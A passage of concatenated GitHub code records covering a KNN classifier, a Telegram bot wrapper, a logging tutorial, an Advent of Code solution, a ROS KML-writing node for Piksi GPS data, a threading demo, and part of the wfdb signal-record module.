for predicted,actual in zip(predicted_lables,y):\n if predicted==actual:\n correct+=1\n confusion_matrix[actual][predicted]+=1\n\n metrics[0] = precision_score(y,predicted_lables,average=\"macro\")\n metrics[1] = recall_score(y,predicted_lables,average=\"macro\")\n metrics[2] = f1_score(y,predicted_lables,average=\"macro\")\n return correct/len(y), confusion_matrix,metrics\n \n def score_for_n_in_range(self,X,y,n_range):\n if self.project:\n X = self.project_datapoints(X)\n score = np.zeros(n_range,dtype=np.float32)\n \n # creates empty cm with fixed 10 number of classes\n confusion_matrix = np.zeros([n_range,10,10],dtype=int)\n\n #accuracy score\n i = 0 \n for predicted_column in self.predict_for_n_in_range(X,n_range).T:\n correct = 0\n for predicted, actual in zip(predicted_column,y):\n if predicted==actual:\n correct+=1\n confusion_matrix[i][actual][predicted]+=1 # the same way sklearn produces CM\n score[i]=correct/len(y)\n i+=1\n return score,confusion_matrix\n \n def cross_val_score(self,X,Y, n_folds=4):\n rest = len(X)%n_folds\n if rest!=0:\n print(f\"WARNING! Cannot divide given dataset equally into {n_folds} parts. Ignoring last {rest} elements!\")\n X_sets = np.split(X[:-rest],n_folds)\n Y_sets = np.split(Y[:-rest],n_folds)\n\n # create new model, not to overwrite current fit\n model = KNN(self.n_neighbours, \n self.representatives, \n self.project)\n \n # accuracy\n scores = np.empty(n_folds,dtype=float)\n cm= np.empty([n_folds,10,10],dtype=int)\n metrics = np.zeros([n_folds,3],dtype=float)\n\n for i in range(n_folds):\n X_train = X_sets.copy()\n Y_train = Y_sets.copy()\n X_val = X_train.pop(i)\n Y_val = Y_train.pop(i)\n\n model.fit(np.concatenate(X_train),\n np.concatenate(Y_train))\n scores[i],cm[i],metrics[i] = model.score(X_val,Y_val)\n return scores,cm,metrics\n\ndef create_representatives(X,Y):\n n_classes = np.zeros(10,dtype=int) # number of classes\n for y in Y:\n n_classes[y]+=1\n\n # sorts accoring to labels\n X_sorted = [x for _,x in sorted(zip(Y,X),key=lambda el : el[0])]\n \n index_x=0\n class_representants = []\n for n in n_classes:\n n_representatives = math.ceil(math.log2(n)) # eq. 1\n representatives = np.empty((n_representatives),dtype=type(X_sorted[0]))\n step = math.ceil(n/n_representatives) # eq. 2\n for i in range(n_representatives-1):\n representatives[i]=sum(X_sorted[index_x+i*step : index_x+(i+1)*step])//step\n representatives[n_representatives-1] = sum(X_sorted[index_x+(n_representatives-1)*step : index_x+n])//(n-(n_representatives-1)*step) # eq. 4\n index_x+=n\n for el in representatives:\n class_representants.append(el)\n return np.array(class_representants,dtype=int), np.ravel([np.full((math.ceil(math.log2(n))),i,dtype=int) for i in range(10)])","repo_name":"AJaszcz/SSI-projekt","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38032871972","text":"from telegram.ext import Updater, CommandHandler, MessageHandler, Filters\n\n\nclass Chat:\n\n def __init__(self, bot_token, start_callback, message_callback, logger):\n self.__bot_token = bot_token\n self.__start_callback = start_callback\n self.__message_callback = message_callback\n self.__logger = logger\n\n def start(self):\n updater = Updater(token=self.__bot_token, use_context=True)\n dispatcher = updater.dispatcher\n\n start_handler = CommandHandler('start', self.__get_tg_start_callback())\n message_handler = MessageHandler(Filters.text, self.__get_tg_message_callback())\n dispatcher.add_handler(start_handler)\n dispatcher.add_handler(message_handler)\n\n self.__logger.log('Bot started')\n\n updater.start_polling()\n\n def __get_tg_start_callback(self):\n def callback(update, context):\n chat_id = update.effective_chat.id\n response = self.__start_callback(chat_id)\n self.__logger.log(f'/start was triggered\\n{str(update.effective_chat)}\\nBot:\\n{response}')\n context.bot.send_message(chat_id=chat_id, text=response)\n\n return callback\n\n def __get_tg_message_callback(self):\n def callback(update, context):\n chat_id = update.effective_chat.id\n message = update.message.text\n\n response = self.__message_callback(chat_id, message)\n self.__logger.log(f'Chat {chat_id}:\\n{message}\\n\\nBot:\\n{response}')\n context.bot.send_message(chat_id=chat_id, text=response)\n\n return callback\n","repo_name":"resivalex/answer-correctly-to-go-further-telegram-bot","sub_path":"src/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70677913654","text":"#%%\n\"\"\"\n* Logging level allows us to specify exactly what we want to log by seperating them into categories\n\n* Categories = debug, info, warnming, error, critical\n* 1) DEBUG: Detailed information, typically of interest only when diagnosing problems.\n\n* 2) INFO: Confirmation that things are working as expected.\n\n* 3) WARNING: An indication that something unexpected happened, or indicative of some problem in the near future (e.g. ‘disk space low’). The software is still working as expected.\n\n* 4) ERROR: Due to a more serious problem, the software has not been able to perform some function.\n\n* 5) CRITICAL: A serious error, indicating that the program itself may be unable to continue running.\n\n* The default level of logging is set to WARNING, hence anything above and equal to WARNING will be flagged which include WARNING, ERROR and CRITICAL\n\n\"\"\"\n\n#%%\nimport logging\nimport os\nimport pandas as pd\n\nos.chdir(r'C:\\Users\\tanzh\\OneDrive\\Git Folder\\python_reference_materials\\script-setup')\n# to ensure that we putting the log file in the correct location\n\nfor handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\nlogging.basicConfig(filename='test.log', format='%(asctime)s : %(levelname)s : %(message)s') \n# this is will create the test file, date is in yyyy-mm-dd\n\ntry :\n data = pd.read_csv(r'C:\\Users\\tanzh\\Downloads\\diabetes121556.csv')\n new_data = data.head(15)\n new_data.to_csv('new_data.csv', index=False)\n print('Completed. Please check the output.')\n logging.info('Script ran sucessfully.')\n\nexcept FileNotFoundError:\n print('The file is not found.')\n logging.warning(f'The file is not found')\n logging.error(f'The file is not found')\n logging.critical(f'The file is not found')\n\n","repo_name":"harvey-tan91/python_reference_materials","sub_path":"script-setup/how_to_create_log_files.py","file_name":"how_to_create_log_files.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21168471280","text":"#!/usr/bin/env python\n\nfrom aocd import get_data, submit\nimport os\n\nfrom games import RockPaperScissors, part_two\n\ndef parseGames(gamesdata):\n games = []\n for game_data in gamesdata.split(\"\\n\"):\n games.append(RockPaperScissors(game_data))\n\n print(f\"Part one: {sum([game.score for game in games])}\")\n\n p2 = [part_two[game.user_plays][game.elf_plays] for game in games]\n print(p2)\n print(sum(p2))\n # submit(sum(p2))\n\n\n\ndef main(test=False):\n if test:\n raw_data = open(\"test.txt\").read()\n else:\n day = int(os.getcwd()[-2:])\n raw_data = get_data(day=day, year=2022)\n \n parseGames(raw_data)\n\nif __name__ == '__main__':\n main()","repo_name":"wmkuipers/aoc2022","sub_path":"day02/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9504800665","text":"#!/usr/bin/env python\n\n#\n# Title: piksi_rtk_kml.py\n# Description: ROS node to write KML file from Piksi messages.\n#\n\nimport rospy\nimport roslib.packages\nimport time\nfrom datetime import datetime\nfrom piksi_rtk_msgs.msg import *\nfrom sensor_msgs.msg import NavSatFix\nfrom geometry_msgs.msg import PointStamped\n\n\nclass PiksiRtkKml:\n kRosPackageName = \"piksi_rtk_kml\"\n kAvailableKmlLayouts = [\"LineString\", \"Placemark\"]\n\n def __init__(self):\n rospy.init_node('piksi_rtk_kml')\n # Check requested KML layout\n self.kml_layout = str(rospy.get_param('~kml_layout', self.kAvailableKmlLayouts[0]))\n if not self.kml_layout in self.kAvailableKmlLayouts:\n error_msg = \"Requested KML layout %s is not available.\" % self.kml_layout\n rospy.logfatal(error_msg)\n rospy.signal_shutdown(error_msg)\n\n # KML file\n package_path = roslib.packages.get_pkg_dir(self.kRosPackageName)\n kml_file_name = datetime.utcfromtimestamp(rospy.get_time()).strftime('%Y-%m-%d-%H-%M-%S')\n self.kml_file_path = \"%s/kml/%s.kml\" % (package_path, kml_file_name)\n self.file_obj = open(self.kml_file_path, 'w')\n self.file_obj.write(self.kml_head(kml_file_name))\n\n # Settings.\n self.sampling_period = 1.0 / rospy.get_param('~sampling_frequency', 1.0)\n self.use_altitude_from_enu = rospy.get_param('~use_altitude_from_enu', False)\n self.extrude_point = rospy.get_param('~extrude_point', False)\n self.use_heading = rospy.get_param('~use_heading', True)\n self.placemarker_prefix_name = rospy.get_param('~placemarker_prefix_name', \"WP\")\n self.tessellate = rospy.get_param('~tessellate', 0)\n self.stick_points_to_ground = rospy.get_param('~stick_points_to_ground', False)\n self.kml_altitude_mode = rospy.get_param('~kml_altitude_mode', \"absolute\")\n\n if self.use_altitude_from_enu and self.kml_altitude_mode != \"relativeToGround\":\n rospy.logwarn(\"If you want to use altitude from enu_point_fix topic, \\\n it is recommended to set parameter kml_altitude_mode = 'relativeToGround'\")\n\n # Subscribe.\n rospy.Subscriber('piksi/navsatfix_rtk_fix', NavSatFix,\n self.navsatfix_rtk_fix_callback)\n rospy.Subscriber('piksi/baseline_heading', BaselineHeading,\n self.baseline_heading_callback)\n rospy.Subscriber('piksi/enu_point_fix', PointStamped,\n self.enu_point_callback)\n\n # Variables.\n self.waypoint_counter = 0\n self.heading_received = False\n self.last_heading = 0.0\n self.time_last_writing = rospy.get_time()\n self.last_enu_altitude = 0.0\n self.first_navsatfix_received = False\n\n rospy.on_shutdown(self.close_kml_file_handler)\n\n rospy.spin()\n\n def navsatfix_rtk_fix_callback(self, msg):\n\n if not self.first_navsatfix_received:\n if self.kml_layout == \"LineString\":\n self.file_obj.write(self.kml_linestring_preamble())\n self.first_navsatfix_received = True\n\n if rospy.get_time() >= (self.time_last_writing + self.sampling_period):\n\n self.waypoint_counter = self.waypoint_counter + 1\n waypoint_name = self.placemarker_prefix_name + str(self.waypoint_counter)\n utc_time = time.strftime(\"%Y-%m-%dT%H:%M:%SZ\", time.gmtime(msg.header.stamp.to_sec()))\n lat = msg.latitude\n lon = msg.longitude\n if self.use_altitude_from_enu:\n alt = self.last_enu_altitude\n else:\n alt = msg.altitude\n description = ''\n\n if self.heading_received:\n description = 'Receiver Baseline Heading: ' + str(self.last_heading / 1e3) + \" [deg].\"\n\n kml_string = \"\"\n if self.kml_layout == \"LineString\":\n kml_string = self.kml_linestring(lat, lon, alt)\n elif self.kml_layout == \"Placemark\":\n kml_string = self.kml_placemark(waypoint_name, utc_time, lat, lon, alt, description)\n\n self.file_obj.write(kml_string)\n\n self.time_last_writing = rospy.get_time()\n\n def baseline_heading_callback(self, msg):\n self.heading_received = True\n self.last_heading = msg.heading\n\n def enu_point_callback(self, msg):\n self.last_enu_altitude = msg.point.z\n\n def close_kml_file_handler(self):\n if self.kml_layout == \"LineString\":\n self.file_obj.write(self.kml_linestring_tail())\n self.file_obj.write(self.kml_tail())\n self.file_obj.close()\n rospy.loginfo(rospy.get_name() + ' KML file written in \\'%s\\'' % self.kml_file_path)\n\n # Adapted from: https://github.com/hitzg/bag_tools/blob/master/bag_to_kml.py\n def kml_head(self, name):\n return '''\n\n\n %s\n''' % (name)\n\n # Adapted from: https://github.com/hitzg/bag_tools/blob/master/bag_to_kml.py\n def kml_tail(self):\n return '''\n'''\n\n def kml_placemark(self, name, timestamp, lat, lon, alt=0, description=''):\n return '''\n \n %s\n \n %s\n \n \n %s\n %s\n %f, %f, %f\n \n %s\n \n''' % (name, timestamp, self.extrude_point,\n self.kml_altitude_mode, lon, lat, alt, description) # KML wants first lon and then lat.\n\n def kml_linestring(self, lat, lon, alt=0):\n # do not put space between numbers and comas!\n return '''\n %f,%f,%f''' % (lon, lat, alt) # KML wants first lon and then lat.\n\n def kml_linestring_preamble(self):\n return '''\n \n \n Absolute Extruded\n \n #yellowLineGreenPoly\n \n %d\n %d\n %s\n \n''' % (self.extrude_point, self.tessellate, self.kml_altitude_mode)\n\n def kml_linestring_tail(self):\n return '''\n \n \n \n'''\n","repo_name":"ethz-asl/ethz_piksi_ros","sub_path":"piksi_rtk_kml/src/piksi_rtk_kml/piksi_rtk_kml.py","file_name":"piksi_rtk_kml.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"21"} +{"seq_id":"36799673923","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport threading\nimport time\nt_l = []\n\ns = threading.BoundedSemaphore(3) # 控制最多线程并发量\n\ndef run(n):\n with s:\n print(\"running\")\n time.sleep(n)\n\n # s.release() # boundedsemaphore过多释放会报错\n\n\nif __name__ == \"__main__\":\n for n in range(10):\n t_l.append(threading.Thread(target=run, args=(n, )))\n\n for i in range(10):\n t_l[i].start()\n # a = False\n # def test():\n # assert a, \"not\"\n # print(\"okk\")\n #\n # test()","repo_name":"diaoyuqiang/python","sub_path":"threading_/threading_boundedsemaphore.py","file_name":"threading_boundedsemaphore.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35510055551","text":"import datetime\nimport multiprocessing\nimport posixpath\nimport re\n\nimport numpy as np\nimport os\nimport pandas as pd\nimport requests\n\nfrom . import _header\nfrom . import _signal\nfrom . import download\n\nimport pdb\n\n\nclass BaseRecord(object):\n # The base WFDB class extended by the Record and MultiRecord classes.\n def __init__(self, record_name=None, n_sig=None,\n fs=None, counter_freq=None, base_counter=None,\n sig_len=None, base_time=None, base_date=None,\n comments=None, sig_name=None):\n self.record_name = record_name\n self.n_sig = n_sig\n self.fs = fs\n self.counter_freq = counter_freq\n self.base_counter = base_counter\n self.sig_len = sig_len\n self.base_time = base_time\n self.base_date = base_date\n self.comments = comments\n self.sig_name = sig_name\n\n def check_field(self, field, required_channels='all'):\n \"\"\"\n Check whether a single field is valid in its basic form. Does\n not check compatibility with other fields.\n\n Parameters\n ----------\n field : str\n The field name\n required_channels : list, optional\n Used for signal specification fields. All channels are\n checked for their integrity if present, but channels that do\n not lie in this field may be None.\n\n Notes\n -----\n This function is called from wrheader to check fields before\n writing. It is also supposed to be usable at any point to\n check a specific field.\n\n \"\"\"\n item = getattr(self, field)\n if item is None:\n raise Exception('Missing field required: %s' % field)\n\n # We should have a list specifying these automatically.\n\n # Whether the item should be a list. Watch out for required_channels for `segments`\n expect_list = True if field in LIST_FIELDS else False\n\n # Check the type of the field (and of its elements if it should\n # be a list)\n _check_item_type(item, field_name=field,\n allowed_types=ALLOWED_TYPES[field],\n expect_list=expect_list,\n required_channels=required_channels)\n\n # Individual specific field checks\n\n if field in ['d_signal', 'p_signal']:\n check_np_array(item=item, field_name=field, ndim=2,\n parent_class=(lambda f: np.integer if f == 'd_signal' else np.floating)(field))\n elif field in ['e_d_signal', 'e_p_signal']:\n for ch in range(len(item)):\n check_np_array(item=item[ch], field_name=field,\n ndim=1, parent_class=(lambda f: np.integer if f == 'e_d_signal' else np.floating)(field),\n channel_num=ch)\n\n # Record specification fields\n\n elif field == 'record_name':\n # Allow letters, digits, hyphens, and underscores.\n accepted_string = re.match('[-\\w]+', self.record_name)\n if not accepted_string or accepted_string.string != self.record_name:\n raise ValueError('record_name must only comprise of letters, digits, hyphens, and underscores.')\n elif field == 'n_seg':\n if self.n_seg <= 0:\n raise ValueError('n_seg must be a positive integer')\n elif field == 'n_sig':\n if self.n_sig <= 0:\n raise ValueError('n_sig must be a positive integer')\n elif field == 'fs':\n if self.fs <= 0:\n raise ValueError('fs must be a positive number')\n elif field == 'counter_freq':\n if self.counter_freq <= 0:\n raise ValueError('counter_freq must be a positive number')\n elif field == 'base_counter':\n if self.base_counter <= 0:\n raise ValueError('base_counter must be a positive number')\n elif field == 'sig_len':\n if self.sig_len < 0:\n raise ValueError('sig_len must be a non-negative integer')\n\n # Signal specification fields\n elif field in _header.SIGNAL_SPECS.index:\n if required_channels == 'all':\n required_channels = range(len(item))\n\n for ch in range(len(item)):\n # If the element is allowed to be None\n if ch not in required_channels:\n if item[ch] is None:\n continue\n\n if field == 'file_name':\n # Check for file_name characters\n accepted_string = re.match('[-\\w]+\\.?[\\w]+', item[ch])\n if not accepted_string or accepted_string.string != item[ch]:\n raise ValueError('File names should only contain alphanumerics, hyphens, and an extension. eg. record-100.dat')\n # Check that dat files are grouped together\n if not is_monotonic(self.file_name):\n raise ValueError('Signals in a record that share a given file must be consecutive.')\n elif field == 'fmt':\n if item[ch] not in _signal.DAT_FMTS:\n raise ValueError('File formats must be valid WFDB dat formats:', _signal.DAT_FMTS)\n elif field == 'samps_per_frame':\n if item[ch] < 1:\n raise ValueError('samps_per_frame values must be positive integers')\n elif field == 'skew':\n if item[ch] < 0:\n raise ValueError('skew values must be non-negative integers')\n elif field == 'byte_offset':\n if item[ch] < 0:\n raise ValueError('byte_offset values must be non-negative integers')\n elif field == 'adc_gain':\n if item[ch] <= 0:\n raise ValueError('adc_gain values must be positive')\n elif field == 'baseline':\n # Original WFDB library 10.5.24 only has 4 bytes for\n # baseline.\n if item[ch] < -2147483648 or item[ch] > 2147483648:\n raise ValueError('baseline values must be between -2147483648 (-2^31) and 2147483647 (2^31 -1)')\n elif field == 'units':\n if re.search('\\s', item[ch]):\n raise ValueError('units strings may not contain whitespaces.')\n elif field == 'adc_res':\n if item[ch] < 0:\n raise ValueError('adc_res values must be non-negative integers')\n elif field == 'block_size':\n if item[ch] < 0:\n raise ValueError('block_size values must be non-negative integers')\n elif field == 'sig_name':\n if re.search('\\s', item[ch]):\n raise ValueError('sig_name strings may not contain whitespaces.')\n if len(set(item)) != len(item):\n raise ValueError('sig_name strings must be unique.')\n\n # Segment specification fields and comments\n elif field in _header.SEGMENT_SPECS.index:\n for ch in range(len(item)):\n if field == 'seg_name':\n # Segment names must be alphanumerics or just a\n # single '~'\n if item[ch] == '~':\n continue\n accepted_string = re.match('[-\\w]+', item[ch])\n if not accepted_string or accepted_string.string != item[ch]:\n raise ValueError(\"Non-null segment names may only contain alphanumerics and dashes. Null segment names must be set to '~'\")\n elif field == 'seg_len':\n # For records with more than 1 segment, the first\n # segment may be the layout specification segment\n # with a length of 0\n min_len = 0 if ch == 0 else 1\n if item[ch] < min_len:\n raise ValueError('seg_len values must be positive integers. Only seg_len[0] may be 0 to indicate a layout segment')\n # Comment field\n elif field == 'comments':\n if item[ch].startswith('#'):\n print(\"Note: comment strings do not need to begin with '#'. This library adds them automatically.\")\n if re.search('[\\t\\n\\r\\f\\v]', item[ch]):\n raise ValueError('comments may not contain tabs or newlines (they may contain spaces and underscores).')\n\n\n def check_read_inputs(self, sampfrom, sampto, channels, physical,\n smooth_frames, return_res):\n \"\"\"\n Ensure that input read parameters (from rdsamp) are valid for\n the record\n\n \"\"\"\n\n # Data Type Check\n if not hasattr(sampfrom, '__index__'):\n raise TypeError('sampfrom must be an integer')\n if not hasattr(sampto, '__index__'):\n raise TypeError('sampto must be an integer')\n if not isinstance(channels, list):\n raise TypeError('channels must be a list of integers')\n\n # Duration Ranges\n if sampfrom < 0:\n raise ValueError('sampfrom must be a non-negative integer')\n if sampfrom > self.sig_len:\n raise ValueError('sampfrom must be shorter than the signal length')\n if sampto < 0:\n raise ValueError('sampto must be a non-negative integer')\n if sampto > self.sig_len:\n raise ValueError('sampto must be shorter than the signal length')\n if sampto <= sampfrom:\n raise ValueError('sampto must be greater than sampfrom')\n\n # Channel Ranges\n if len(channels):\n if min(channels) < 0:\n raise ValueError('Input channels must all be non-negative integers')\n if max(channels) > self.n_sig - 1:\n raise ValueError('Input channels must all be lower than the total number of channels')\n\n if return_res not in [64, 32, 16, 8]:\n raise ValueError(\"return_res must be one of the following: 64, 32, 16, 8\")\n if physical is True and return_res == 8:\n raise ValueError(\"return_res must be one of the following when physical is True: 64, 32, 16\")\n\n # Cannot expand multiple samples/frame for multi-segment records\n if isinstance(self, MultiRecord):\n if smooth_frames is False:\n raise ValueError('This package version cannot expand all samples when reading multi-segment records. Must enable frame smoothing.')\n\n\n def _adjust_datetime(self, sampfrom):\n \"\"\"\n Adjust date and time fields to reflect user input if possible.\n\n Helper function for the `_arrange_fields` of both Record and\n MultiRecord objects.\n \"\"\"\n if sampfrom:\n dt_seconds = sampfrom / self.fs\n if self.base_date and self.base_time:\n self.base_datetime = datetime.datetime.combine(self.base_date,\n self.base_time)\n self.base_datetime += datetime.timedelta(seconds=dt_seconds)\n self.base_date = self.base_datetime.date()\n self.base_time = self.base_datetime.time()\n # We can calculate the time even if there is no date\n elif self.base_time:\n tmp_datetime = datetime.datetime.combine(\n datetime.datetime.today().date(), self.base_time)\n self.base_time = (tmp_datetime\n + datetime.timedelta(seconds=dt_seconds)).time()\n # Cannot calculate date or time if there is only date\n\n\n\nclass Record(BaseRecord, _header.HeaderMixin, _signal.SignalMixin):\n \"\"\"\n The class representing single segment WFDB records.\n\n Record objects can be created using the initializer, by reading a WFDB\n header with `rdheader`, or a WFDB record (header and associated dat files)\n with `rdrecord`.\n\n The attributes of the Record object give information about the record as\n specified by: https://www.physionet.org/physiotools/wag/header-5.htm\n\n In addition, the d_signal and p_signal attributes store the digital and\n physical signals of WFDB records with at least one channel.\n\n Examples\n --------\n >>> record = wfdb.Record(record_name='r1', fs=250, n_sig=2, sig_len=1000,\n file_name=['r1.dat','r1.dat'])\n\n \"\"\"\n def __init__(self, p_signal=None, d_signal=None,\n e_p_signal=None, e_d_signal=None,\n record_name=None, n_sig=None,\n fs=None, counter_freq=None, base_counter=None,\n sig_len=None, base_time=None, base_date=None,\n file_name=None, fmt=None, samps_per_frame=None,\n skew=None, byte_offset=None, adc_gain=None,\n baseline=None, units=None, adc_res=None,\n adc_zero=None, init_value=None, checksum=None,\n block_size=None, sig_name=None, comments=None):\n\n # Note the lack of the 'n_seg' field. Single segment records cannot\n # have this field. Even n_seg = 1 makes the header a multi-segment\n # header.\n\n super(Record, self).__init__(record_name, n_sig,\n fs, counter_freq, base_counter, sig_len,\n base_time, base_date, comments, sig_name)\n\n self.p_signal = p_signal\n self.d_signal = d_signal\n self.e_p_signal = e_p_signal\n self.e_d_signal = e_d_signal\n\n self.file_name = file_name\n self.fmt = fmt\n self.samps_per_frame = samps_per_frame\n self.skew = skew\n self.byte_offset = byte_offset\n self.adc_gain = adc_gain\n self.baseline = baseline\n self.units = units\n self.adc_res = adc_res\n self.adc_zero = adc_zero\n self.init_value = init_value\n self.checksum = checksum\n self.block_size = block_size\n\n # Equal comparison operator for objects of this type\n def __eq__(self, other, verbose=False):\n att1 = self.__dict__\n att2 = other.__dict__\n\n if set(att1.keys()) != set(att2.keys()):\n if verbose:\n print('Attributes members mismatch.')\n return False\n\n for k in att1.keys():\n\n v1 = att1[k]\n v2 = att2[k]\n\n if type(v1) != type(v2):\n if verbose:\n print('Mismatch in attribute: %s' % k, v1, v2)\n return False\n\n if type(v1) == np.ndarray:\n # Necessary for nans\n np.testing.assert_array_equal(v1, v2)\n else:\n if v1 != v2:\n if verbose:\n print('Mismatch in attribute: %s' % k, v1, v2)\n return False\n\n return True\n\n\n def wrsamp(self, expanded=False, write_dir=''):\n \"\"\"\n Write a wfdb header file and any associated dat files from this\n object.\n\n Parameters\n ----------\n expanded : bool, optional\n Whether to write the expanded signal (e_d_signal) instead\n of the uniform signal (d_signal).\n write_dir : str, optional\n The directory in which to write the files.\n\n \"\"\"\n # Perform field validity and cohesion checks, and write the\n # header file.\n self.wrheader(write_dir=write_dir)\n if self.n_sig > 0:\n # Perform signal validity and cohesion checks, and write the\n # associated dat files.\n self.wr_dats(expanded=expanded, write_dir=write_dir)\n\n\n def _arrange_fields(self, channels, sampfrom=0, expanded=False):\n \"\"\"\n Arrange/edit object fields to reflect user channel and/or signal\n range input.\n\n Parameters\n ----------\n channels : list\n List of channel numbers specified.\n sampfrom : int, optional\n Starting sample number read.\n expanded : bool, optional\n Whether the record was read in expanded mode.\n\n \"\"\"\n\n # Rearrange signal specification fields\n for field in _header.SIGNAL_SPECS.index:\n item = getattr(self, field)\n setattr(self, field, [item[c] for c in channels])\n\n # Expanded signals - multiple samples per frame.\n if expanded:\n # Checksum and init_value to be updated if present\n # unless the whole signal length was input\n if self.sig_len != int(len(self.e_d_signal[0]) / self.samps_per_frame[0]):\n self.checksum = self.calc_checksum(expanded)\n self.init_value = [s[0] for s in self.e_d_signal]\n\n self.n_sig = len(channels)\n self.sig_len = int(len(self.e_d_signal[0]) / self.samps_per_frame[0])\n\n # MxN numpy array d_signal\n else:\n # Checksum and init_value to be updated if present\n # unless the whole signal length was input\n if self.sig_len != self.d_signal.shape[0]:\n\n if self.checksum is not None:\n self.checksum = self.calc_checksum()\n if self.init_value is not None:\n ival = list(self.d_signal[0, :])\n self.init_value = [int(i) for i in ival]\n\n # Update record specification parameters\n # Important that these get updated after^^\n self.n_sig = len(channels)\n self.sig_len = self.d_signal.shape[0]\n\n # Adjust date and time if necessary\n self._adjust_datetime(sampfrom=sampfrom)\n\n\nclass MultiRecord(BaseRecord, _header.MultiHeaderMixin):\n \"\"\"\n The class representing multi-segment WFDB records.\n\n MultiRecord objects can be created using the initializer, or by reading a\n multi-segment WFDB record using 'rdrecord' with the `m2s` (multi to single)\n input parameter set to False.\n\n The attributes of the MultiRecord object give information about the entire\n record as specified by: https://www.physionet.org/physiotools/wag/header-5.htm\n\n In addition, the `segments` parameter is a list of Record objects\n representing each individual segment, or None representing empty segments,\n of the entire multi-segment record.\n\n Notably, this class has no attribute representing the signals as a whole.\n The 'multi_to_single' instance method can be called on MultiRecord objects\n to return a single segment representation of the record as a Record object.\n The resulting Record object will have its 'p_signal' field set.\n\n Examples\n --------\n >>> record_m = wfdb.MultiRecord(record_name='rm', fs=50, n_sig=8,\n sig_len=9999, seg_name=['rm_1', '~', rm_2'],\n seg_len=[800, 200, 900])\n >>> # Get a MultiRecord object\n >>> record_s = wfdb.rdsamp('s00001-2896-10-10-00-31', m2s=False)\n >>> # Turn it into a\n >>> record_s = record_s.multi_to_single()\n\n record_s initially stores a `MultiRecord` object, and is then converted into\n a `Record` object.\n\n \"\"\"\n def __init__(self, segments=None, layout=None,\n record_name=None, n_sig=None, fs=None,\n counter_freq=None, base_counter=None,\n sig_len=None, base_time=None, base_date=None,\n seg_name=None, seg_len=None, comments=None,\n sig_name=None, sig_segments=None):\n\n\n super(MultiRecord, self).__init__(record_name, n_sig,\n fs, counter_freq, base_counter, sig_len,\n base_time, base_date, comments, sig_name)\n\n self.layout = layout\n self.segments = segments\n self.seg_name = seg_name\n self.seg_len = seg_len\n self.sig_segments = sig_segments\n\n\n def wrsamp(self, write_dir=''):\n \"\"\"\n Write a multi-segment header, along with headers and dat files\n for all segments, from this object.\n \"\"\"\n # Perform field validity and cohesion checks, and write the\n # header file.\n self.wrheader(write_dir=write_dir)\n # Perform record validity and cohesion checks, and write the\n # associated segments.\n for seg in self.segments:\n seg.wrsamp(write_dir=write_dir)\n\n def _check_segment_cohesion(self):\n \"\"\"\n Check the cohesion of the segments field with other fields used\n to write the record\n \"\"\"\n\n if self.n_seg != len(self.segments):\n raise ValueError(\"Length of segments must match the 'n_seg' field\")\n\n for i in range(n_seg):\n s = self.segments[i]\n\n # If segment 0 is a layout specification record, check that its file names are all == '~''\n if i == 0 and self.seg_len[0] == 0:\n for file_name in s.file_name:\n if file_name != '~':\n raise ValueError(\"Layout specification records must have all file_names named '~'\")\n\n # Sampling frequencies must all match the one in the master header\n if s.fs != self.fs:\n raise ValueError(\"The 'fs' in each segment must match the overall record's 'fs'\")\n\n # Check the signal length of the segment against the corresponding seg_len field\n if s.sig_len != self.seg_len[i]:\n raise ValueError('The signal length of segment '+str(i)+' does not match the corresponding segment length')\n\n totalsig_len = totalsig_len + getattr(s, 'sig_len')\n\n # No need to check the sum of sig_lens from each segment object against sig_len\n # Already effectively done it when checking sum(seg_len) against sig_len\n\n\n\n def _required_segments(self, sampfrom, sampto):\n \"\"\"\n Determine the segments and the samples within each segment in a\n multi-segment record, that lie within a sample range.\n\n Parameters\n ----------\n sampfrom : int\n The starting sample number to read for each channel.\n sampto : int\n The sample number at which to stop reading for each channel.\n\n \"\"\"\n\n # The starting segment with actual samples\n if self.layout == 'fixed':\n startseg = 0\n else:\n startseg = 1\n\n # Cumulative sum of segment lengths (ignoring layout segment)\n cumsumlengths = list(np.cumsum(self.seg_len[startseg:]))\n # Get first segment\n seg_numbers = [[sampfrom < cs for cs in cumsumlengths].index(True)]\n # Get final segment\n if sampto == cumsumlengths[len(cumsumlengths) - 1]:\n seg_numbers.append(len(cumsumlengths) - 1)\n else:\n seg_numbers.append([sampto <= cs for cs in cumsumlengths].index(True))\n\n # Add 1 for variable layout records\n seg_numbers = list(np.add(seg_numbers,startseg))\n\n # Obtain the sampfrom and sampto to read for each segment\n if seg_numbers[1] == seg_numbers[0]:\n # Only one segment to read\n seg_numbers = [seg_numbers[0]]\n # The segment's first sample number relative to the entire record\n segstartsamp = sum(self.seg_len[0:seg_numbers[0]])\n readsamps = [[sampfrom-segstartsamp, sampto-segstartsamp]]\n\n else:\n # More than one segment to read\n seg_numbers = list(range(seg_numbers[0], seg_numbers[1]+1))\n readsamps = [[0, self.seg_len[s]] for s in seg_numbers]\n\n # Starting sample for first segment.\n readsamps[0][0] = sampfrom - ([0] + cumsumlengths)[seg_numbers[0]-startseg]\n\n # End sample for last segment\n readsamps[-1][1] = sampto - ([0] + cumsumlengths)[seg_numbers[-1]-startseg]\n\n return (seg_numbers, readsamps)\n\n\n def _required_channels(self, seg_numbers, channels, dir_name, pb_dir):\n \"\"\"\n Get the channel numbers to be read from each specified segment,\n given the channel numbers specified for the entire record.\n\n Parameters\n ----------\n seg_numbers : list\n List of segment numbers to read.\n channels : list\n The channel indices to read for the whole record. Same one\n specified by user input.\n\n Returns\n -------\n required_channels : list\n List of lists, containing channel indices to read for each\n desired segment.\n\n 